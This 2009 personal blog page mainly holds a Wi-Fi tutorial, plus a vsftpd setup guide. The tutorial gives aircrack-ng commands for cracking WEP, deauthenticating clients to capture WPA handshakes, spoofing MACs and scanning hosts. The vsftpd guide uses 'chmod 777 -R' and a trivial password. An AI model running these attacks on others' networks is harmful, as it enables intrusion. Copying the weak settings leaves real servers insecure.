Sunday, October 25, 2009

The LCD thread

Good place to start when you looking for new monitor.

How to protect your wireless home network

To understand that, we will learn how actually to break them first ;-)
It is recommended that you experiment with your home wireless access point to get familiar with these ideas and techniques. If you do not own a particular access point, please remember to get permission from the owner prior to playing with it.
I will use Ubuntu (Gnome desktop) under root account with some non-default tools
apt-get install nmap macchanger
You will need to install aircrack-ng and adapter drivers from sources to get lastest version.

I got Edimax EW-7318USg for ~$30 as recomended devices.

Shortcuts I will use in aircrack-ng suite.
AP-MAC - MAC address of access point (AP), examples:
AP-CH - channel AP is working on, ex: 11
AP-NAM - wireless network name, ex: teddy
MY-MAC - MAC address of your adapter, ex: 001f1f3676fc
CL-MAC - MAC address of client already assosiated with AP (will need for DeAuth attack), ex: 012345abcdef
Interface I will use rausb0.

Simple WEP Crack

Put the card to monitor mode
airmon-ng stop rausb0
airmon-ng start rausb0

And let's start scan
airodump-ng rausb0

Get target network and try if we can inject packets
aireplay-ng -9 -e AP-NAM -a AP-MAC rausb0
test on all rates
aireplay-ng -9 -e AP-NAM -a AP-MAC -B rausb0

Start capturing IVs for target network to files
airodump-ng -c AP-CH --bssid AP-MAC -w output rausb0

Fake authentication with the access point otherwise it will deny our packets
aireplay-ng -1 0 -e AP-NAM -a AP-MAC -h MY-MAC rausb0
aireplay-ng -1 6000 -o 1 -q 10 -e AP-NAM -a AP-MAC -h MY-MAC rausb0

Start aireplay in ARP request replay mode
aireplay-ng -3 -b AP-MAC -h MY-MAC rausb0
Or replay packets from a wireless client
aireplay-ng -2 -a AP-MAC -d ffffffffffff -m 68 -n 68 -t 1 -f 0 rausb0
Or access point to rebroadcast the packet
aireplay-ng -2 -p 0841 -b AP-MAC -c ffffffffffff -h MY-MAC rausb0
ARP packets are typically either 68 (from a wireless client) or 86 (from a wired client) bytes
aireplay-ng -2 -p 0841 -m 68 -n 86 -b AP-MAC -c ffffffffffff -h MY-MAC rausb0
Or aireplay can be used to replay packets from a pcap file
aireplay-ng -2 -p 0841 -b AP-MAC -h MY-MAC -r replay_src-0303-124624.cap rausb0
aireplay-ng -2 -p 0841 -b AP-MAC -c ffffffffffff -h MY-MAC -r some-capture.cap rausb0
Or use ready-to-send packet
aireplay-ng -2 -r arp-request rausb0

When you got from 40K to 80K data packets, we can try to crack the password
aircrack-ng -b AP-MAC output*.cap - PTW method
aircrack-ng -z -b AP-MAC output*.cap - FMS/KoreK method

When no wireless clients exists

Fragmenation attack to obtain PRGA
aireplay-ng -5 -b AP-MAC -h MY-MAC rausb0
Chopchop attack to obtain PRGA
aireplay-ng -4 -b AP-MAC -h MY-MAC rausb0

You will get some "fragment-0203-180343.xor" file for the next step.

Use packetforge-ng to create an arp packet
packetforge-ng -0 -a AP-MAC -h MY-MAC -k -l -y fragment-0203-180343.xor -w arp-request

You can inspect created packet
tcpdump -n -vvv -e -s0 -r arp-request
Since you are testing against your own AP (you are, right?), then decrypt the packet and ensure it is correct
airdecap-ng -e AP-NAM -w arp-request
View the decrypted packet
tcpdump -n -r arp-request-dec

How to Crack WPA/WPA2

The only way is to capture 4-way authentication handshake
Connected client deauth once
aireplay-ng -0 1 -a AP-MAC -c CL-MAC rausb0
or 3 times (to be sure ;-)
aireplay-ng -0 10 -a AP-MAC -c CL-MAC rausb0

For cracking, you will need good wordlists
aircrack-ng -w password.lst,another.lst -b AP-MAC wpa*.cap

Other useful stuff

MAC address change - manual way
ifdown rausb0
ifconfig rausb0 hw ether 00:11:22:33:44:55
ifup rausb0

But better with
macchanger --mac 00:11:22:33:44:55

Set bitrate
iwconfig rausb0 rate 54M
iwconfig rausb0 rate 11M

Scan network for devices
nmap -sP

Scan services on specific device
nmap -NP

Windows information and shares (if open)
smbclient -L \\
smbclient -L \\ -U Guest -W workgroup

Kernel modules control
lsmod | grep 73
modprobe rt73

Trace packets by
tcpdump -n -vvv -s0 -e -i | grep -i -E ”(RA:|Authentication|ssoc)”

Gnome NetworkManager (sometimes better to stop it during attacks)
/etc/init.d/NetworkManager start|stop|restart
nm-tool --list
tail -f /var/log/daemon.log | grep NetworkManager


aircrac-ng tutorials and faq
Latest nmap

So, to protect your wireless network, don't use WEP, use WPA/WPA2 with long and complicated password, MAC-filtering will only pause hacker for a while (till he can see one of authenticated clients MACs), hiding SSID doesn't help at all.

UPD: Good news there from aircrack team:
updated Slitaz aircrack distribution (Aircrack-ng 1.0 final including sqlite airolib-ng support, patched drivers, etc)
WPA Cracker - cloud cracking service

Sunday, October 11, 2009

Adobe Photoshop Color management

Adobe Photoshop Color management for dummies (like me)

Tuesday, October 6, 2009

VSFTPD and virtual user

I will show you how to install FTP server on RedHat Linux and made virtual user "upload" with password "kuku" for uploading and downloading files.

First, you need to run
[alexey@blogger ~]$ sudo yum install vsftpd
i got version 2.0.1
[alexey@blogger ~]$ vsftpd -v
vsftpd: version 2.0.1
than let's backup original config
[alexey@blogger ~]$ sudo cp /etc/vsftpd/vsftpd.conf /etc/vsftpd/vsftpd.conf.default
now we can edit config for our needs, open vi
[alexey@blogger ~]$ sudo vi /etc/vsftpd/vsftpd.conf
paste the following
ftpd_banner=Welcome to my FTP!

Now we should create virtual users authentication file, you can use Apache's tools.
'-c' creates new file (remove it when adding new users), '-b' will take password from command line
[alexey@blogger ~]$ /usr/local/httpd/bin/htpasswd -cb /path/to/ftp/users upload kuku
Adding password for user default

Now we need to tell how vsftpd should check users, it will use PAM that described in
[alexey@blogger ~]$ cat /etc/pam.d/vsftpd
auth required item=user sense=deny file=/etc/vsftpd.ftpusers onerr=succeed
auth required service=system-auth
auth required
account required service=system-auth
session required service=system-auth
backup it with
[alexey@blogger ~]$ sudo cp /etc/pam.d/vsftpd /etc/pam.d/vsftpd.default
and paste the following
[alexey@blogger ~]$ cat /etc/pam.d/vsftpd
# MaggaPlus access
auth required pwdfile /path/to/ftp/users
account required
[alexey@blogger ~]$

At this point you can start deamon with
[alexey@blogger ~]$ sudo /etc/init.d/vsftpd start
and if everything is ok, try to connect to your new FTP.

I was dealing with some problem that even if i use username and password pair I just created, it always was return me "Invalid login". I thought that the problem was in the users file and i rewrited it many time. But it was just pwdfile file missing, that I got from
[alexey@blogger ~]$ sudo tail /var/log/messages
Oct 5 20:21:57 blogger vsftpd: vsftpd vsftpd succeeded
Oct 5 20:21:59 blogger vsftpd[27288]: PAM unable to dlopen(/lib/security/
Oct 5 20:21:59 blogger vsftpd[27288]: PAM [dlerror: /lib/security/ cannot open shared object file: No such file
Oct 5 20:21:59 blogger vsftpd[27288]: PAM adding faulty module: /lib/security/
All PAM plugins placed in
[alexey@blogger ~]$ ll /lib/security/
total 1884
-rwxr-xr-x 1 root root 15560 May 12 2006
-rwxr-xr-x 1 root root 52334 Oct 13 2004
-rwxr-xr-x 1 root root 6004 May 12 2006
And was missing :-(
I found it and installed
[alexey@blogger ~]$ sudo rpm -i pam-pam_pwdfile-0.99-2.i586.rpm
warning: pam-pam_pwdfile-0.99-2.i586.rpm: V3 DSA signature: NOKEY, key ID 1bbd5459
Now it is fine, and FTP auth worked!
[alexey@blogger ~]$ ll /lib/security/
-rwxr-xr-x 1 root root 14572 Jul 30 2004 /lib/security/
Make sure that FTP root is readable and writable for specified user
[alexey@blogger ~]$ chmod 777 -R /path/to/ftp-directory

[alexey@blogger ~]$ ftp localhost
Connected to localhost (
220 Welcome to my FTP!
Name (blogger:alexey): upload
331 Please specify the password.
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> close
221 Goodbye.
ftp> bye
[alexey@blogger ~]$

Information used